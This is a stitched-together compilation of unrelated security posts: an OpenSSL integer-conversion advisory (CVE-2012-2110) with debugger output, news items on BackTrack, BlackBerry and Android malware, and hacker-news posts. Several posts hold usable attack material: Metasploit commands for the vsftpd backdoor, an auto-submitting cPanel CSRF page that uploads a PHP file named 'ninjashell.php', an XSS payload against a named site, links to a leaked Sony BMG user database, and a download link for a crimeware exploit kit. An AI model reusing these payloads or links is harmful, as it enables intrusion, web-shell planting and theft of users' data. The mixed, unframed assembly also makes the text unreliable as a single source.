[Full-disclosure] incorrect integer conversions in #OpenSSL can result in memory corruption.

Incorrect integer conversions in OpenSSL can result in memory corruption.
--------------------------------------------------------------------------

CVE-2012-2110

This advisory is intended for system administrators and developers exposing
OpenSSL in production systems to untrusted data.

asn1_d2i_read_bio in OpenSSL contains multiple integer errors that can cause
memory corruption when parsing encoded ASN.1 data. This error can be exploited
on systems that parse untrusted data, such as X.509 certificates or RSA public
keys.

The following context structure from asn1.h is used to record the current state
of the decoder:

typedef struct asn1_const_ctx_st
{
    const unsigned char *p;/* work char pointer */
    int eos;    /* end of sequence read for indefinite encoding */
    int error;  /* error code to use when returning an error */
    int inf;    /* constructed if 0x20, indefinite is 0x21 */
    int tag;    /* tag from last 'get object' */
    int xclass; /* class from last 'get object' */
    long slen;  /* length of last 'get object' */
    const unsigned char *max; /* largest value of p allowed */
    const unsigned char *q;/* temporary variable */
    const unsigned char **pp;/* variable */
    int line;   /* used in error processing */
} ASN1_const_CTX;

These members are populated via calls to ASN1_get_object and asn1_get_length
which have the following prototypes

int ASN1_get_object(const unsigned char **pp,
                    long *plength,
                    int *ptag,
                    int *pclass,
                    long omax);

int asn1_get_length(const unsigned char **pp,
                    int *inf,
                    long *rl,
                    int max);

The lengths are always stored as signed longs, however, asn1_d2i_read_bio
casts ASN1_const_CTX->slen to a signed int in multiple locations. This
truncation can result in numerous conversion problems.

The most visible example on x64 is this cast incorrectly interpreting the
result of asn1_get_length.

222             /* suck in c.slen bytes of data */
223             want=(int)c.slen;

A simple way to demonstrate this is to prepare a DER certificate that contains
a length with the 31st bit set, like so

$ dumpasn1 testcase.crt
0 NDEF: [PRIVATE 3] {
   2 2147483648:   [1]
        ...
   }

Breakpoint 2, asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffffffd8f0) at a_d2i_fp.c:224
224             if (want > (len-off))
(gdb) list
219             }
220         else
221             {
222             /* suck in c.slen bytes of data */
223             want=(int)c.slen;
224             if (want > (len-off))
225                 {
226                 want-=(len-off);
227                 if (!BUF_MEM_grow_clean(b,len+want))
228                     {
(gdb) p c.slen
$18 = 2147483648
(gdb) p want
$19 = -2147483648

This results in an inconsistent state, and will lead to memory corruption.

--------------------
Affected Software
------------------------

All versions of OpenSSL on all platforms up to and including version 1.0.1 are
affected.

Some attack vectors require an I32LP64 architecture, others do not.

--------------------
Consequences
-----------------------

In order to explore the subtle problems caused by this, an unrelated bug in the
OpenSSL allocator wrappers must be discussed.

It is generally expected that the realloc standard library routine should support
reducing the size of a buffer, as well as increasing it. As ISO C99 states "The
realloc function deallocates the old object pointed to by ptr and returns a
pointer to a new object that has the size specified by size. The contents of the
new object shall be the same as that of the old object prior to deallocation,
up to the lesser of the new and old sizes."

However, the wrapper routines from OpenSSL do not support shrinking a buffer,
due to this code:

void *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line)
{
    /* ... */
    ret=malloc_ex_func(num,file,line);
    if(ret)
        {
        memcpy(ret,str,old_len);
        OPENSSL_cleanse(str,old_len);
        free_func(str);
        }
    /* ... */
    return ret;
}

The old data is always copied over, regardless of whether the new size will be
enough. This allows us to turn this truncation into what is effectively:

    memcpy(heap_buffer, <attacker controlled buffer>, <attacker controlled size>);

We can reach this code by simply causing an integer to be sign extended and
truncated multiple times. These two protoypes are relevant:

int BUF_MEM_grow_clean(BUF_MEM *str, size_t len);

void *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line);

BUF_MEM_grow_clean accepts a size_t, but the subroutine it uses to handle the
allocation only accepts a 32bit signed integer. We can exploit this by
providing a large amount of data to OpenSSL, and causing the length calculation
here to become negative:

            /* suck in c.slen bytes of data */
            want=(int)c.slen;
            if (want > (len-off))
                {
                want-=(len-off);
                if (!BUF_MEM_grow_clean(b,len+want))
                    {
                    ASN1err(ASN1_F_ASN1_D2I_READ_BIO,ERR_R_MALLOC_FAILURE);
                    goto err;
                    }

Because want is a signed int, the sign extension to size_t for
BUF_MEM_grow_clean means an unexpectedly size_t is produced. An
example is probably helpful:

(gdb) bt
#0  asn1_d2i_read_bio (in=0x9173a0, pb=0x7fffffffd8f0) at a_d2i_fp.c:223
#1  0x0000000000524ce8 in ASN1_item_d2i_bio (it=0x62d740, in=0x9173a0, x=0x0) at a_d2i_fp.c:112
#2  0x000000000054c132 in d2i_X509_bio (bp=0x9173a0, x509=0x0) at x_all.c:150
#3  0x000000000043b7a7 in load_cert (err=0x8a1010, file=0x0, format=1, pass=0x0, e=0x0, cert_descrip=0x5ebcc0 "Certificate") at apps.c:819
#4  0x0000000000422422 in x509_main (argc=0, argv=0x7fffffffe458) at x509.c:662
#5  0x00000000004032d9 in do_cmd (prog=0x9123e0, argc=3, argv=0x7fffffffe440) at openssl.c:489
#6  0x0000000000402ee6 in main (Argc=3, Argv=0x7fffffffe440) at openssl.c:381
(gdb) list
218                 want=HEADER_SIZE;
219             }
220         else 
221             {
222             /* suck in c.slen bytes of data */
223             want=(int)c.slen;
224             if (want > (len-off))
225                 {
226                 want-=(len-off);
227                 if (!BUF_MEM_grow_clean(b,len+want))
(gdb) pt len
type = int
(gdb) pt want
type = int
(gdb) p len
$28 = 1431655797
(gdb) p want
$29 = 2147483646
(gdb) p len+want
$30 = -715827853
(gdb) s
BUF_MEM_grow_clean (str=0x917440, len=18446744072993723763) at buffer.c:133
(gdb) p/x len
$31 = 0xffffffffd5555573

Here len+want wraps to a negative value, which is sign extended to a large
size_t for BUF_MEM_grow_clean. Now the call to CRYPTO_realloc_clean() truncates
this back into a signed int:

CRYPTO_realloc_clean (str=0x7fff85be4010, old_len=1908874388, num=477218632, file=0x626661 "buffer.c", line=149) at mem.c:369

Now old_len > num, which openssl does not handle, resulting in this:

 ret = malloc_ex_func(num, file, line);

 memcpy(ret, str, old_len);

Effectively a textbook heap overflow. It is likely this code is reachable via
the majority of the d2i BIO interfaces and their wrappers, so most applications
that handle untrusted data via OpenSSL should take action.

Note that even if you do not use d2i_* calls directly, many of the higher level
APIs will use it indirectly for you. Producing DER data to demonstrate this
is relatively easy for both x86 and x64 architectures.

-------------------
Solution
-----------------------

The OpenSSL project has provided an updated version to resolve this issue.

http://www.openssl.org/
http://www.openssl.org/news/secadv_20120419.txt

-------------------
Credit
-----------------------

This bug was discovered by Tavis Ormandy, Google Security Team.

Additional thanks to Adam Langley also of Google for analysis and designing a fix.

-- 
-------------------------------------
taviso at cmpxchg8b.com | pgp encrypted mail preferred
-------------------------------------------------------

Student stiffs penetration tool BackTrack Linux with 0-day

Network daemon fingered in after-school game

-

A student has discovered a critical vulnerability in BackTrack, a flavour of Linux that’s a favourite among security pros.

The previously undiscovered (hence zero-day) privilege escalation bug in the network penetration-testing distro was discovered during an ethical hacking class organised by the InfoSec Institute.

Jack Koziol, security programme manager at the institute, explained that the bug in Backtrack 5 R2 (the latest version) allowed the student to overwrite settings to gain a root shell. The flaw was found in wicd (the Wireless Interface Connection Daemon), which has not been tested for “potential remote exploitation vectors” according to Koziol.

The security flaw was discovered during fuzzing, which is a technique that lobs random or unexpected data at software to trigger vulnerabilities. While it’s unclear if it could be exploited remotely, it still needs fixing.

The security bug stems from a failure to sanitise user inputs, a deficiency that creates a mechanism to start a given executable or script with root-level privileges on systems running the daemon, provided the hacker has local hands-on access.

“This 0-day exploit for BackTrack 5 R2 was discovered by a student in the InfoSec Institute ethical hacking class, during an evening capture-the-flag exercise,” Koziol explained. “The student wishes to remain anonymous, he has contributed a python version of the 0-day, a patch that can be applied to wicd, as well as a writeup detailing the discovery and exploitation process.”

More details, with a proof-of-concept exploit and patch can be found, on the institute’s website here.

Developers rated the bug “critical” and put out an advisory and an (official) patched version of wicd 1.7.2, which fixes the issue.

BackTrack Linux is a favourite among the security community. Other Linux distributions share the vulnerable wireless network card manager component, including Debian (details here) and Arch.

The cleverclogs who discovered the flaw enjoyed a breakfast of champions, Koziol explained.

“Usually the winner of the CTF exercise in the ethical hacking course gets a free InfoSec polo shirt, and the instructor buys him or her a beer. This guy was so excited he found the bug he stayed up all night making an exploit and patch and ended up having the beer for breakfast the day after while the rest of the class ate pancakes.” ®

BlackBerry Enterprise Server vulnerable to malicious image file


There are remotely and easily exploitable vulnerabilities in the BlackBerry Enterprise Server that could allow an attacker to gain access to the server by simply sending a malicious image file to a user’s BlackBerry device.

The vulnerabilities are in several version of BES for Exchange, Lotus Domino and Novell GroupWise, and Research in Motion said that an attacker who is able to exploit one of the bugs might also be able to move from the compromised BES server to other parts of the network. The company has issued a patch for the BES flaws and says that they are at the top of the severity scale in terms of exploitability.

The vulnerability in both the BlackBerry MDS Connection Service and the BlackBerry Messaging Agent is related to the way that the components handle PNG and TIFF image files. Exploiting the vulnerabilities can be as easy as sending a malicious PNG or TIFF file to a BlackBerry user. In some scenarios, the user wouldn’t even need to open the email or click on a link in order to complete the attack.

“Successful exploitation of any of these vulnerabilities might allow an attacker to gain access to and execute code on the BlackBerry Enterprise Server. Depending on the privileges available to the configured BlackBerry Enterprise Server service account, the attacker might also be able to extend access to other non-segmented parts of the network,” RIM said in its advisory.

[Source]

Video Demonstration : Vsftpd backdoor discovered by Mathias Kresin

Video Demonstration : Vsftpd backdoor discovered by Mathias Kresin










2.3.4 of vsftpd’s downloadable source code was compromised and a backdoor added to the code. Evans, the author of vsftpd . This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz archive sometime before July 3rd 2011.
The bad tarball included a backdoor in the code which would respond to a user logging in with a user name “:)” by listening on port 6200 for a connection and launching a shell when someone connects. Read more here

Affected versions :
vsftpd-2.3.4 from 2011-06-30

Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

Video Demonstration :

Security Alert : cPanel 11.25 CSRF vulnerability to upload any php Script ! ~ THN : The Hackers News

cPanel versions below and excluding 11.25 , are vulnerable to CSRF which leads to uploading a PHP script of the attackers liking. If you have turned off security tokens and referrer security check, no matter what version you are using, you are vulnerable as well.

Proof Of Concept :
 


 <html> <form name="editform" action=" http://localhost:2082/frontend/x3/err/savefile.htmlmethod=POST onSubmit="return loadfdata();"> <input type="hidden" id="codepage" class="codepress html" name="page" value="<?php echo 'ninjashell'; ?>"> <input type="hidden" name="domain" value="localhost"> <input type="hidden" value="public_html/" name="dir"> <input type="hidden" value="ninjashell.php" name="file"> <body onload="document.forms.editform.submit();"> </form> </html>



Afterwards simply check for ninjashell.php in the directory.
Counter-measures
All cPanel versions starting from 11.25 and above have two in-built security features to prevent such attacks - security tokens and referrer security check. This means that if you are a cpanel client, you should update your
software.

The Vulnerability has been found & Submitted to us by Ninja-Shell , An Ethical hacker, Freelance security consultant/penetration tester &  Security researcher in the spare time. He has Over 12 years of experience. You can Contact him at ninjashellmail@gmail.com .

Facebook Says - I am vulnerable, Please Hack Me ! ~ THN : The Hackers News



I have so many friends on facebook and everyone of them always asks me why Facebook sucks ? So finally I am showing that facebook is completely against your Security & Privacy and there are more  other secure ways to connect with world, like Twitter, Orkut. Here we have One more Facebook vulnerable link , as shown below. It looks funny, but YES ! Facebook is the most vulnerable site on internet that is used by thousands of millions users daily.


Link : https://www.facebook.com/connect/connect_to_node_error.php?body=I%20am%20vulnerable,%20Please%20Hack%20Me%20!

Daily a new Vulnerability, 100’s of Scams Lets have a look on Some of them here :
1.) Police warns - Beware Facebook scams !
2.) New Facebook worm propagating : VERIFY MY ACCOUNT , Video Explanation of code !
3.) New Facebook Scam : WTF I can’t believe you’re in this video !
4.) Facebook new Vulnerability, Lots of Accounts misused for spamming !
5.) Script that gives hackers access to user accounts floods Facebook !
6.) JavaScript hole in Facebook !
7.) Vulnerability in Facebook Email feature Exposed !
8.) Facebook virus spreads via photo album chat messages !
9.) You got owned, Exposure about privacy on facebook !
10) Facebook Vulnerability - Beware of A New XSS on Facebook !
11) Facebook is not Exclusion, XML Vulnerability !

Where is the Risk :
One risk is that a significant number of people actually do stop using Facebook completely, possibly out of fear of how their data might be used, but also because they are fatigued by the constant changes. This hasn’t happened yet, despite many critics predicting that it would over the years. But there could still be a tipping point, where the build-up of issues finally convinces people to leave a msg.

The other risk is that agencies from national governments, particularly the United States’ Federal Trade Commission, impose stiff new regulations on what product changes that Facebook can make going forward, thereby limiting its ability to improve its products.

At last :
Facebook Prepares to Launch Bug Bounty Program - Get Details from here.

Sony BGM Greece Hack, Complete Details Out ! ~ THN : The Hackers News


Yesterday , we have reported that On 5th May, 2011 - Sony BGM’s Greek website was also got hacked.  One of Them Provided the Full extract database from the site.  b4d_vipera was the hacker who Deface the site using SQL injection method. There are 8385 users on this website. Sample of hacked Database was leaked at http://pastebin.com/WqLysjiN . This was 7th Attack on Sony.


As from Source :
DB Detection: MsSQL no error (Auto Detected)
Method: GETType: 
Data Base: SONYBMG
Table: USERS
Total Rows: 8385
Fields are : u_id, u_usr , u_name, u_pwd , u_company , u_email , u_tel , FOREIGN_DOMAIN , u_regdate ,  u_lname


Hacked Link : http://www.sonymusic.gr/theodoridou/page/releases/lyrics.asp?id=2133Mirror Link : http://zone-h.org/mirror/id/13621890

XSS in JustDial.com & 6 sites Defaced by Cyb3r.pr3dat0r ( Team DNA Stuxnet) ~ THN : The Hackers News


Hacked Sites :
http://worldoffrank.co.uk/
http://scrutineer.co.uk/
http://worldoffrank.co.uk/
http://bloomsbury-interiors.co.uk/
http://davidwatkin.co.uk/
http://friedafrowhawk.co.uk/

XSS on Justdial.com :
Open http://search.justdial.com/srch/search.php & Search “<h3><marquee>Xssed by Cyb3r.pr3dat0r ( Team DNA Stuxnet)</marquee></h3>

Unknown Exploit Kit (Crimeware) leaked, Available for Download ! ~ THN : The Hackers News

Another New Exploit kit is now in Black Market called Unknown Exploit Kit or Mushroom Exploit Kit . After The Public Release of Source code of ZeuS Botnet Version: 2.0.8.9 , THN also provide Crimepack 3.1.3 Exploit kit &  26 more Underground Hacking Exploit Kits for Download and Research.


Now 1st Public Release of Spanish version of Unknown Exploit Kit is here…


This kit offers the following exploits:
MDAC, SpreadSheet, SnapShot, Aurora, CSSClip, IEPeers, PDF LibTiff, PDF GetIcon, PDF CollectEmail, JAVA, Shockwave, and AOL.


Screenshots :





Download Links :
http://www.multiupload.com/6U6T4MB7SD

Note : The Public Release of these kits are only for Educational and Research Purpose Only. May this help Antivirus and Security Companies to Analyse and develop advance Security wares. Thanks.

Pangolin 3.2.3 - Automatic SQL injection penetration testing tool New Release ! ~ THN : The Hackers News


Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool for Website manager or IT Security analyst. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or users specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Test many types of databases

  • Your web applications using Access,DB2,Informix,Microsoft SQL Server
  • 2000,Microsoft SQL Server 2005,Microsoft SQL Server
  • 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase?
  • Pangolin supports all of them.
  • Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall
  • setting, Injection Digger, Data dumper, etc.



Download Click Here

Google's Android phones face more attacks via apps

Google’s Android mobile-phone platform faces soaring software attacks and has little control over the applications, according to security firm Kaspersky Lab.

Applications loaded with malicious software are infiltrating the Google operating system at a faster rate than hackers did with personal computers at the same stage in development, said Nikolay Grebennikov, chief technology officer for Kaspersky. The company identified 70 different types of malware in March, up from two categories in September.

“The growth rate in malware within Android is huge; in the future there will definitely be more,” Grebennikov said. Kaspersky will offer security on Android in the third quarter of this year.

Hacking into mobile-phone software has become increasingly sophisticated, forcing Mountain View’s Google to remove malicious applications that were available from its Android Market store last month. The applications, which were remotely disabled, gathered information about mobile devices and could be used to access personal data.

Company spokesman Ollie Rickman referred back to Google’s comment in a blog post last month.

“We are adding a number of measures to help prevent additional malicious applications using similar exploits from being distributed through Android Market,” said Rich Cannings, a Google engineer who works on Android security, in the blog post.

Android will run on 38.5 percent of smart phones sold this year, according to market research firm Gartner. Google’s software is moving into cheaper hardware and starting to compete with high-volume, low-margin phones made by companies such as Nokia.

“Any time a technology becomes adopted and popular, that technology will be targeted by the bad guys,” said Jay Abbott, director of threat and vulnerability at PricewaterhouseCoopers LLP.

The proliferation of mobile app stores at platforms from companies including Google, Apple, Microsoft, Research In Motion and Nokia has made the functions and devices harder to secure, said Richard Overill, a senior lecturer in computer science at King’s College, London.

“It is a new frontier,” said Overill, who has been researching the industry since 1992. “It’s been an area that the criminal fraternity hasn’t gone into before because they are doing quite nicely, thank you, in the computer space.”

This article appeared on page D - 2 of the San Francisco Chronicle

Top